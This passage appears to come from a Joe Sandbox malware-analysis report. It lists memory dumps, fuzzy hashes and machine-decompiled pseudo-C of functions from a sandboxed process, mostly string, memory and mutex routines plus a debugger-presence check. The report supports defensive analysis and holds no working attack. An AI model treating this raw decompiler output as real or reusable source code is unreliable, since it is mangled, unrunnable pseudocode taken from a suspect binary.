                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: CreateInternalProcessmemset
                        • String ID: h
                        • API String ID: 101748716-2439710439
                        • Opcode ID: eef3edf5d091453e364523cc21dfba746a8a76b8bf20acd88da7ba6da478e26d
                        • Instruction ID: f07efe2704b35b44b15f52cb1c6ae021d50490386ae8c9ed6d71086ccb7b67a2
                        • Opcode Fuzzy Hash: eef3edf5d091453e364523cc21dfba746a8a76b8bf20acd88da7ba6da478e26d
                        • Instruction Fuzzy Hash: 9A212732608B8092E7609B15F45579BB7A5FBC8784F504135EACD97BA8CF7CD149CB40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 21%
                        			E00007FF67FF6935D33F0(signed int* __rcx, long long __rdx, void* __r8) {
                        				intOrPtr _t96;
                        				signed int _t104;
                        				signed int _t110;
                        				signed int _t111;
                        				long long _t134;
                        				intOrPtr _t184;
                        				intOrPtr _t185;
                        				intOrPtr _t187;
                        				intOrPtr _t188;
                        				intOrPtr _t189;
                        				intOrPtr _t190;
                        				intOrPtr _t192;
                        				intOrPtr _t193;
                        				intOrPtr _t195;
                        				intOrPtr _t196;
                        				intOrPtr _t197;
                        				intOrPtr _t199;
                        				intOrPtr _t200;
                        				intOrPtr _t201;
                        				intOrPtr _t203;
                        				intOrPtr _t205;
                        				intOrPtr _t206;
                        				intOrPtr _t208;
                        				intOrPtr _t210;
                        				signed long long _t228;
                        				signed long long _t230;
                        				signed int* _t250;
                        				intOrPtr* _t251;
                        				long long _t252;
                        				long long _t259;
                        				signed int _t263;
                        
                        				_t250 = __rcx;
                        				_t252 = __rdx;
                        				if (__rcx == 0) goto 0x935d39b0;
                        				_t251 =  *0x935f8900; // 0x7ff6936023e0
                        				_t184 =  *_t251;
                        				if (_t184 == 0) goto 0x935d36b8;
                        				if ( *((long long*)(_t184 + 0x38)) != 0) goto 0x935d36d8;
                        				 *((long long*)(_t184 + 0x38)) = 0x935f3fb0;
                        				E00007FF67FF6935D7890(0x935f3fb0);
                        				_t185 =  *_t251;
                        				if (_t185 == 0) goto 0x935d36ed;
                        				if ( *((long long*)(_t185 + 0x48)) == 0) goto 0x935d3818;
                        				_t96 =  *((intOrPtr*)( *((intOrPtr*)(_t185 + 0x48))));
                        				goto 0x935d34a5;
                        				_t228 =  *((intOrPtr*)( *_t251 + 0x40));
                        				_t187 =  *_t251;
                        				if (_t96 -  *_t228 >= 0) goto 0x935d34c0;
                        				if ( *((long long*)(_t187 + 0x10)) == 0) goto 0x935d3718;
                        				if ( *((long long*)( *((intOrPtr*)( *((intOrPtr*)(_t187 + 0x10)))) + _t228 * 8)) == 0) goto 0x935d3830;
                        				if (_t187 == 0) goto 0x935d3730;
                        				if ( *((long long*)(_t187 + 0x40)) != 0) goto 0x935d3470;
                        				 *((long long*)(_t187 + 0x40)) = 0x936023a4;
                        				if (_t96 + 1 -  *0x936023a4 < 0) goto 0x935d347b;
                        				goto 0x935d350d;
                        				asm("o16 nop [eax+eax]");
                        				_t230 =  *((intOrPtr*)(_t187 + 0x48));
                        				_t188 =  *_t251;
                        				if (0 -  *_t230 >= 0) goto 0x935d3528;
                        				if ( *((long long*)(_t188 + 0x10)) == 0) goto 0x935d3798;
                        				_t263 = _t230 * 8;
                        				if ( *((long long*)( *((intOrPtr*)( *((intOrPtr*)(_t188 + 0x10)))) + _t230 * 8)) == 0) goto 0x935d3890;
                        				if (_t188 == 0) goto 0x935d37b0;
                        				if ( *((long long*)(_t188 + 0x48)) != 0) goto 0x935d34d8;
                        				 *((long long*)(_t188 + 0x48)) = 0x936023a0;
                        				if (1 -  *0x936023a0 < 0) goto 0x935d34e3;
                        				if (_t188 == 0) goto 0x935d3b25;
                        				if ( *((long long*)(_t188 + 0x40)) == 0) goto 0x935d3970;
                        				_t189 =  *_t251;
                        				if ( *((intOrPtr*)( *((intOrPtr*)(_t188 + 0x40)))) == 0x100000) goto 0x935d398b;
                        				if (_t189 == 0) goto 0x935d3bae;
                        				_t134 =  *((long long*)(_t189 + 0x40));
                        				if (_t134 == 0) goto 0x935d39c8;
                        				_t190 =  *_t251;
                        				if (_t134 != 0) goto 0x935d358b;
                        				if ( *((long long*)(_t190 + 0x40)) != 0) goto 0x935d3ba5;
                        				 *((long long*)(_t190 + 0x40)) = 0x936023a4;
                        				_t104 =  >  ? 0x100000 :  *0x936023a4 + 1;
                        				if (_t190 == 0) goto 0x935d3d57;
                        				if ( *((long long*)(_t190 + 0x10)) == 0) goto 0x935d3a90;
                        				realloc(??, ??);
                        				_t259 =  *((intOrPtr*)(_t190 + 0x10));
                        				_t192 =  *_t251;
                        				if (_t259 == 0) goto 0x935d3f12;
                        				if (_t192 == 0) goto 0x935d3d95;
                        				if ( *((long long*)(_t192 + 0x40)) == 0) goto 0x935d3a78;
                        				_t193 =  *_t251;
                        				r8d = _t104;
                        				r8d = r8d -  *((intOrPtr*)( *((intOrPtr*)(_t192 + 0x40))));
                        				if ( *(_t193 + 0x40) == 0) goto 0x935d3a60;
                        				memset(??, ??, ??);
                        				_t195 =  *_t251;
                        				if (_t195 == 0) goto 0x935d3d31;
                        				if ( *((long long*)(_t195 + 0x10)) == 0) goto 0x935d3a40;
                        				_t196 =  *_t251;
                        				 *((long long*)( *((intOrPtr*)(_t195 + 0x10)))) = _t259;
                        				if (_t196 == 0) goto 0x935d3c12;
                        				if ( *((long long*)(_t196 + 0x40)) == 0) goto 0x935d3a30;
                        				_t197 =  *_t251;
                        				r12d =  *((intOrPtr*)( *((intOrPtr*)(_t196 + 0x40))));
                        				if ( *((long long*)(_t197 + 0x48)) == 0) goto 0x935d3a20;
                        				r12d = r12d + 1;
                        				 *((intOrPtr*)( *((intOrPtr*)(_t197 + 0x48)))) = r12d;
                        				if ( *(_t197 + 0x40) == 0) goto 0x935d3a10;
                        				_t110 =  *( *(_t197 + 0x40));
                        				 *__rcx = _t110;
                        				if ( *(_t197 + 0x40) == 0) goto 0x935d3a00;
                        				 *( *(_t197 + 0x40)) = _t104;
                        				if (__rdx == 0) goto 0x935d3afd;
                        				if ( *((long long*)(_t197 + 0x10)) == 0) goto 0x935d3ac8;
                        				 *((long long*)( *((intOrPtr*)( *((intOrPtr*)(_t197 + 0x10)))) + (_t259 +  *(_t193 + 0x40) * 8) * 8)) = __rdx;
                        				goto 0x935d38b6;
                        				E00007FF67FF6935D6420(); // executed
                        				if ( *((long long*)(_t197 + 0x38)) == 0) goto 0x935d342b;
                        				if ( *_t251 != 0) goto 0x935d36d8;
                        				E00007FF67FF6935D6420();
                        				E00007FF67FF6935D7890( *((intOrPtr*)( *_t251 + 0x38)));
                        				_t199 =  *_t251;
                        				if (_t199 != 0) goto 0x935d3447;
                        				E00007FF67FF6935D6420();
                        				_t200 =  *_t251;
                        				if ( *((long long*)(_t199 + 0x48)) == 0) goto 0x935d3818;
                        				if (_t200 != 0) goto 0x935d3452;
                        				E00007FF67FF6935D6420();
                        				goto 0x935d3452;
                        				 *((long long*)(_t200 + 0x10)) = _t259;
                        				goto 0x935d348a;
                        				E00007FF67FF6935D6420();
                        				_t201 =  *_t251;
                        				if ( *((long long*)(_t200 + 0x40)) == 0) goto 0x935d34b5;
                        				if (_t201 != 0) goto 0x935d3470;
                        				E00007FF67FF6935D6420();
                        				if ( *((intOrPtr*)( *((intOrPtr*)(_t201 + 0x40)))) - _t104 <= 0) goto 0x935d3f1d;
                        				_t203 =  *_t251;
                        				if (_t203 != 0) goto 0x935d347b;
                        				E00007FF67FF6935D6420();
                        				if ( *((long long*)(_t203 + 0x10)) == 0) goto 0x935d3718;
                        				if ( *_t251 != 0) goto 0x935d3486;
                        				E00007FF67FF6935D6420();
                        				_t205 =  *_t251;
                        				goto 0x935d348a;
                        				 *((long long*)(_t205 + 0x10)) = _t259;
                        				goto 0x935d34f2;
                        				E00007FF67FF6935D6420();
                        				_t206 =  *_t251;
                        				if ( *((long long*)(_t205 + 0x48)) == 0) goto 0x935d351d;
                        				if (_t206 != 0) goto 0x935d34d8;
                        				E00007FF67FF6935D6420();
                        				if ( *((intOrPtr*)( *((intOrPtr*)(_t206 + 0x48)))) - _t104 <= 0) goto 0x935d3f25;
                        				_t208 =  *_t251;
                        				if (_t208 != 0) goto 0x935d34e3;
                        				E00007FF67FF6935D6420();
                        				if ( *((long long*)(_t208 + 0x10)) == 0) goto 0x935d3798;
                        				if ( *_t251 != 0) goto 0x935d34ee;
                        				E00007FF67FF6935D6420();
                        				_t210 =  *_t251;
                        				goto 0x935d34f2;
                        				 *((long long*)(_t210 + 0x48)) = 0x936023a0;
                        				goto 0x935d3459;
                        				 *_t250 = _t104;
                        				if (_t252 == 0) goto 0x935d3930;
                        				if (_t210 == 0) goto 0x935d3ae8;
                        				_t111 = _t110 & 0xffffff00 |  *((long long*)(_t210 + 0x10)) != 0x00000000;
                        				if (_t111 == 0) goto 0x935d391c;
                        				if (_t210 == 0) goto 0x935d3b8b;
                        				 *((long long*)( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x10)))) + _t263)) = _t252;
                        				if (_t210 == 0) goto 0x935d3ab3;
                        				if ((_t111 & 0xffffff00 |  *((long long*)(_t210 + 0x38)) != 0x00000000) == 0) goto 0x935d390f;
                        				if (_t210 != 0) goto 0x935d38c2;
                        				E00007FF67FF6935D6420();
                        				goto 0x935d38c2;
                        				 *_t250 = _t104;
                        				if (_t252 == 0) goto 0x935d38dc;
                        				if (_t210 == 0) goto 0x935d3e0e;
                        				if ( *((long long*)(_t210 + 0x10)) == 0) goto 0x935d3aa3;
                        				 *((long long*)( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x10)))) + _t263)) = _t252;
                        				if (_t210 == 0) goto 0x935d38f9;
                        				if ( *((long long*)(_t210 + 0x38)) == 0) goto 0x935d390f;
                        				E00007FF67FF6935D77D0( *((intOrPtr*)(_t210 + 0x38)));
                        				return 0;
                        			}

                        APIs
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: realloc
                        • String ID:
                        • API String ID: 471065373-0
                        • Opcode ID: 1e3a401cabf507db577af07eb5123edae5da50469f8323c4d18b77a930690b86
                        • Instruction ID: 734cc58497efe12d5deba4601aeab775f89b6f25a5d5e7780d523093bb47955f
                        • Opcode Fuzzy Hash: 1e3a401cabf507db577af07eb5123edae5da50469f8323c4d18b77a930690b86
                        • Instruction Fuzzy Hash: A7624A72A09B0681FA759F09E0823796BA8EF4CB84F5544B7CA6DA7395EF7CE440C340
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        C-Code - Quality: 100%
                        			E00007FF67FF6935D32C0(void* __rax, intOrPtr* __rcx, void* __rdx) {
                        				intOrPtr _t8;
                        				void* _t14;
                        
                        				_t14 = __rax;
                        				if (__rdx == 0) goto 0x935d33d8;
                        				if ( *__rcx == 1) goto 0x935d3328;
                        				E00007FF67FF6935D02C0(__rcx);
                        				_t1 = _t14 + 8; // 0x8
                        				E00007FF67FF6935CF8A0(_t1);
                        				_t8 =  *__rcx;
                        				if (_t8 == 0) goto 0x935d3340;
                        				if (_t8 != 1) goto 0x935d33b0;
                        				E00007FF67FF6935CFBC0(_t1);
                        				E00007FF67FF6935D04D0(_t14);
                        				return 0;
                        			}

                        APIs
                          • Part of subcall function 00007FF6935D02C0: calloc.MSVCRT(00000002,000002954BDC1770,00007FF898063CA0,00007FF6935D32E6,?,?,?,00000002,000002954BDC1770,00007FF898063CA0,?,00007FF6935CF65B,000002954BDC1770,00000000,00007FF898063CA0,00007FF6935C2B7A), ref: 00007FF6935D0464
                        • fprintf.MSVCRT ref: 00007FF6935D33CB
                        Strings
                        Similarity
                        • API ID: callocfprintf
                        • String ID: once %p is %d
                        • API String ID: 3366074580-95064319
                        • Opcode ID: 00723cf4e8dccbf85ddf62ee5b7c76497c18d2db4ddbe7ac6238ee089c22699f
                        • Instruction ID: e3dd38a26837b3a2fa76231a638eecd0765e9f873a78038755be32dbf356e339
                        • Opcode Fuzzy Hash: 00723cf4e8dccbf85ddf62ee5b7c76497c18d2db4ddbe7ac6238ee089c22699f
                        • Instruction Fuzzy Hash: D431AC72A0974282FA719B15E5022BE63A8FF8C794F4840B7DE5C97391EE3CE581C600
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        APIs
                        Similarity
                        • API ID: CreateErrorLastMutex
                        • String ID:
                        • API String ID: 1925916568-0
                        • Opcode ID: 31c832415eae47506223614dcaa918d6847122a86d481bc17c36b15d07366632
                        • Instruction ID: 6d1dde0ba1c8cf1d0c1b71f95d51fa26b2992f6cf08eed0b0c7d7026bf221367
                        • Opcode Fuzzy Hash: 31c832415eae47506223614dcaa918d6847122a86d481bc17c36b15d07366632
                        • Instruction Fuzzy Hash: 70E0261AE0974641EE0DAB73698723A1165FF4CB88F945C75CD0AE7360DE3C9180C200
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Strings
                        Similarity
                        • API ID: AddressProc$HandleLibraryLoadModule
                        • String ID: SystemFunction036$advapi32.dll$msvcrt.dll$rand_s
                        • API String ID: 384173800-4041758303
                        • Opcode ID: ff5342f052fda170ab1ed1d071b2ad0a17fd6d7206bfa14234cc1ac0ce3a4651
                        • Instruction ID: 7d3d82e9688199ba568fcd301474e6478b113a19140bb6519c5b26fa740fdbec
                        • Opcode Fuzzy Hash: ff5342f052fda170ab1ed1d071b2ad0a17fd6d7206bfa14234cc1ac0ce3a4651
                        • Instruction Fuzzy Hash: C5F01720E0AA03A1EE269B52FC4357423A8FF09740B8401BACC1DF6364EE2CE949E300
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00007FF67FF6935C62A0(void* __rax, void* __rcx) {
                        				signed int _t4;
                        				void* _t5;
                        				void* _t7;
                        				signed char* _t16;
                        
                        				_t16 =  *((intOrPtr*)(__rcx + 0x18));
                        				_t4 =  *_t16 & 0x000000ff;
                        				_t7 = _t4 - 0x55;
                        				if (_t7 == 0) goto 0x935c63a0;
                        				if (_t7 > 0) goto 0x935c6308;
                        				if (_t4 == 0x4e) goto 0x935c65a0;
                        				if (_t4 != 0x53) goto 0x935c63b8;
                        				if (_t16[1] == 0x74) goto 0x935c6440;
                        				_t5 = E00007FF67FF6935C4B80(0, __rcx);
                        				if ( *((char*)( *((intOrPtr*)(__rcx + 0x18)))) == 0x49) goto 0x935c640c;
                        				return _t5;
                        			}

                        Strings
                        Similarity
                        • API ID:
                        • String ID: D$E$E$I$M$S$S$T$std$string literal
                        • API String ID: 0-2655410955
                        • Opcode ID: 1a375f255fb9d92bbdc16474ee812111674dd9c226e41520a532518c1ab90af4
                        • Instruction ID: b7f32753a2d0fca3d709ed5643e27fa08a78237e062b94a17601dcba2818b786
                        • Opcode Fuzzy Hash: 1a375f255fb9d92bbdc16474ee812111674dd9c226e41520a532518c1ab90af4
                        • Instruction Fuzzy Hash: F5E1C772E0964245FF718A15D44ABBE27D9EB687CCF9940B1DA0C97786DE3CE681C380
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00007FF67FF6935D62A0(void* __rcx) {
                        				long _t1;
                        
                        				_t1 = GetLastError();
                        				if (_t1 != 0) goto 0x935d62c0;
                        				return _t1;
                        			}

                        APIs
                        Strings
                        • aaaaaaaaaaaaaaaaaaAAAAAAAAAAAaAAaAaaAaaAAaAAaaaaaaaAaaaAAAAAaaaa, xrefs: 00007FF6935D62A2
                        Similarity
                        • API ID: DebuggerErrorFormatLastMessagePresent
                        • String ID: aaaaaaaaaaaaaaaaaaAAAAAAAAAAAaAAaAaaAaaAAaAAaaaaaaaAaaaAAAAAaaaa
                        • API String ID: 2392558662-3758742686
                        • Opcode ID: 46863d4f8d5c7508d4a1ac3b5574c831b5307448c888aaafa5bcc8e365fc6c90
                        • Instruction ID: 0d836aab5df566f5c64a107600a99c85943806714a9a2093cf5ae754420f06f4
                        • Opcode Fuzzy Hash: 46863d4f8d5c7508d4a1ac3b5574c831b5307448c888aaafa5bcc8e365fc6c90
                        • Instruction Fuzzy Hash: 12018131A0CA0281F7718B26F8473292368FF88B86F580079DA6DE7668EF3CD0459700
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 86%
                        			E00007FF67FF6935DE410(void* __edx, void* __rcx, long long __r8, signed int* __r9, intOrPtr _a40, intOrPtr _a48, long long _a56, long long _a64) {
                        				intOrPtr _v176;
                        				signed int _v180;
                        				long long _v192;
                        				long long _v200;
                        				long long _v208;
                        				intOrPtr _v216;
                        				signed int _t16;
                        				void* _t17;
                        				signed int _t23;
                        				void* _t24;
                        
                        				asm("movaps [esp+0xa0], xmm6");
                        				_t23 =  *__r9;
                        				_v216 = _a40;
                        				_v192 = __r8;
                        				_v176 = _a48;
                        				_v208 = _a56;
                        				_v200 = _a64;
                        				 *__r9 = _t23 & 0xffffffcf;
                        				_t16 = _t23 & 0x00000007;
                        				_t24 = _t16 - 3;
                        				if (_t24 == 0) goto 0x935de740;
                        				_v180 = _t23 & 0x00000004;
                        				if (_t24 != 0) goto 0x935de4c0;
                        				if (_t16 == 0) goto 0x935de710;
                        				_t17 = _t16 - 1;
                        				if (_t17 - 1 <= 0) goto 0x935de508;
                        				asm("movaps xmm6, [esp+0xa0]");
                        				return _t17;
                        			}

                        Strings
                        Similarity
                        • API ID:
                        • String ID: $ $Infinity$NaN
                        • API String ID: 0-3274152445
                        • Opcode ID: 1a0720c5de401bbc20e39417c0624ab467bb66ea8f532059a9948cbdecbdcc6f
                        • Instruction ID: d466c7dc73dc7f3b794a7099978520c9e427de6bf171a4a8276f19debf788257
                        • Opcode Fuzzy Hash: 1a0720c5de401bbc20e39417c0624ab467bb66ea8f532059a9948cbdecbdcc6f
                        • Instruction Fuzzy Hash: 73C2D932A1D6818AE731CF25E44132EB7A4FB89784F148176EA5DA7B99DF3DE4418F00
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 46%
                        			E00007FF67FF6935E7430(long long* __rcx, void* __rdx, void* __r8, void* __r9, void* _a40) {
                        
                        				if (__r9 - 0xfffffff9 + __r8 - __rdx -  *((intOrPtr*)( *((intOrPtr*)(__rcx)) - 0x18)) > 0) goto 0x935e74b0;
                        				E00007FF67FF6935E78B0(__rcx, __rdx -  *((intOrPtr*)(__rcx)), __r8 - __rdx, __r9);
                        				if (__r9 == 0) goto 0x935e748e;
                        				if (__r9 == 1) goto 0x935e74a0;
                        				return memset(??, ??, ??);
                        			}

                        APIs
                        Strings
                        Similarity
                        • API ID: memcpymemsetstrlen
                        • String ID: basic_string::_M_replace_aux
                        • API String ID: 160209724-2536181960
                        • Opcode ID: 5f08d7c5b45ef242c5415bd1fcc40663e3473304bf3f260c443137018827165d
                        • Instruction ID: 9671d78589e0e7b7e9b254c48ed9473189287e34d6ecd3a80d150767c33effdc
                        • Opcode Fuzzy Hash: 5f08d7c5b45ef242c5415bd1fcc40663e3473304bf3f260c443137018827165d
                        • Instruction Fuzzy Hash: 52113A43F592A411E831AA6B7C064F95614AB5EFF4E884371EE5C67791EC3CD482C300
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 37%
                        			E00007FF67FF6935E7500(long long* __rcx, void* __rdx, void* __r8, void* __r9, intOrPtr _a40) {
                        				void* _t5;
                        				intOrPtr _t24;
                        				intOrPtr _t27;
                        				intOrPtr _t35;
                        
                        				_t27 = _a40;
                        				_t24 =  *((intOrPtr*)(__rcx));
                        				_t35 =  *((intOrPtr*)(_t24 - 0x18));
                        				if (__rdx - _t35 > 0) goto 0x935e76cf;
                        				_t30 =  >  ? __r8 : _t35 - __rdx;
                        				if (_t27 - 0xfffffff9 - _t35 + ( >  ? __r8 : _t35 - __rdx) > 0) goto 0x935e76c3;
                        				if (_t24 - __r9 > 0) goto 0x935e7570;
                        				if (__r9 - _t35 + _t24 > 0) goto 0x935e7570;
                        				if ( *((intOrPtr*)(_t24 - 8)) <= 0) goto 0x935e75b8;
                        				_t5 = E00007FF67FF6935E78B0(__rcx, __rdx,  >  ? __r8 : _t35 - __rdx, _t27);
                        				if (_t27 == 0) goto 0x935e75a2;
                        				if (_t27 == 1) goto 0x935e7620;
                        				0x935e0a38();
                        				return _t5;
                        			}







                        0x7ff6935e750d
                        0x7ff6935e7518
                        0x7ff6935e7521
                        0x7ff6935e7528
                        0x7ff6935e7541
                        0x7ff6935e754e
                        0x7ff6935e7557
                        0x7ff6935e755f
                        0x7ff6935e7566
                        0x7ff6935e757c
                        0x7ff6935e7584
                        0x7ff6935e7591
                        0x7ff6935e759d
                        0x7ff6935e75b2

                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID:
                        • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::replace
                        • API String ID: 0-3564965661
                        • Opcode ID: 178b3a1b4b1b6603e235a1ab5da007ed65b7711bd794bcd9a19c29cc5c4113ff
                        • Instruction ID: fa1e5da1f2fb49f108013bc25d30e64e908b8331d800b92b8240d0ef07639ba1
                        • Opcode Fuzzy Hash: 178b3a1b4b1b6603e235a1ab5da007ed65b7711bd794bcd9a19c29cc5c4113ff
                        • Instruction Fuzzy Hash: 3FF03052F08A46A1D920AF67D8065FAA725FB5EBC8F445072EE0C6B366DE2CD111C340
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 68%
                        			E00007FF67FF6935EE4F0(void* __rcx, intOrPtr* __rdx, signed int __r8, void* __r9) {
                        				long long _v24;
                        				void* _t8;
                        				void* _t13;
                        				intOrPtr _t22;
                        
                        				_t22 =  *((intOrPtr*)(__rdx + 8));
                        				_t13 = _t22 - __r8;
                        				_t20 =  <=  ? _t13 : __r9;
                        				if (__r8 - _t22 > 0) goto 0x935ee526;
                        				_v24 =  <=  ? _t13 : __r9;
                        				return E00007FF67FF6935ED220(0, _t8, __rcx, __rdx,  *((intOrPtr*)(__rcx + 8)),  *__rdx + __r8 * 2);
                        			}







                        0x7ff6935ee4f4
                        0x7ff6935ee4fb
                        0x7ff6935ee501
                        0x7ff6935ee50b
                        0x7ff6935ee50d
                        0x7ff6935ee525

                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: memcpy
                        • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::assign
                        • API String ID: 3510742995-2669816585
                        • Opcode ID: d796db268a802fa17d275661f35f7593e2c08a649134d65a8ca2d112d22d4a8f
                        • Instruction ID: 54a874d6dac3e0fed9ac2a366b43b09b2329c6fff0c54293a43b39a0c4412756
                        • Opcode Fuzzy Hash: d796db268a802fa17d275661f35f7593e2c08a649134d65a8ca2d112d22d4a8f
                        • Instruction Fuzzy Hash: 5FF090A6E04B8595D620AF65E8020ACA365F75DF44F88A572EE4C63321DF3CD566C700
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 68%
                        			E00007FF67FF6935EB330(void* __rcx, intOrPtr* __rdx, void* __r8, void* __r9) {
                        				long long _v24;
                        				void* _t7;
                        				void* _t12;
                        				intOrPtr _t21;
                        
                        				_t21 =  *((intOrPtr*)(__rdx + 8));
                        				_t12 = _t21 - __r8;
                        				_t19 =  <=  ? _t12 : __r9;
                        				if (__r8 - _t21 > 0) goto 0x935eb366;
                        				_v24 =  <=  ? _t12 : __r9;
                        				return E00007FF67FF6935EA150(0, _t7, __rcx, __rdx,  *((intOrPtr*)(__rcx + 8)),  *__rdx + __r8);
                        			}







                        0x7ff6935eb334
                        0x7ff6935eb33b
                        0x7ff6935eb341
                        0x7ff6935eb34b
                        0x7ff6935eb34d
                        0x7ff6935eb365

                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: memcpy
                        • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::assign
                        • API String ID: 3510742995-2669816585
                        • Opcode ID: 5054e097d87ac96f7cb638d309eced32f40e760cbb4a9381c2bbfca1d581737b
                        • Instruction ID: df82e9519ea94e304d91a60713a3f5d4b45788d638ff6b3a3038773799dd2ba6
                        • Opcode Fuzzy Hash: 5054e097d87ac96f7cb638d309eced32f40e760cbb4a9381c2bbfca1d581737b
                        • Instruction Fuzzy Hash: D3F090AAE05BC595D620AFA5D8020ECB364F75DF84F895172DA4C63321DF3CD666C700
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00007FF67FF6935E4860(signed int** __rcx, intOrPtr* __rdx, void* __r8, void* __r9) {
                        				intOrPtr _t8;
                        
                        				_t8 =  *((intOrPtr*)(__rdx + 8));
                        				if (__r8 - _t8 > 0) goto 0x935e48a6;
                        				 *((long long*)(__rcx)) = __rcx + 0x10;
                        				_t10 =  >  ? __r9 : _t8 - __r8;
                        				r9d = 0;
                        				return E00007FF67FF6935EA640(__rcx,  *__rdx + __r8,  *__rdx + __r8 + ( >  ? __r9 : _t8 - __r8));
                        			}




                        0x7ff6935e4866
                        0x7ff6935e4870
                        0x7ff6935e4879
                        0x7ff6935e4886
                        0x7ff6935e488d
                        0x7ff6935e48a5

                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmp
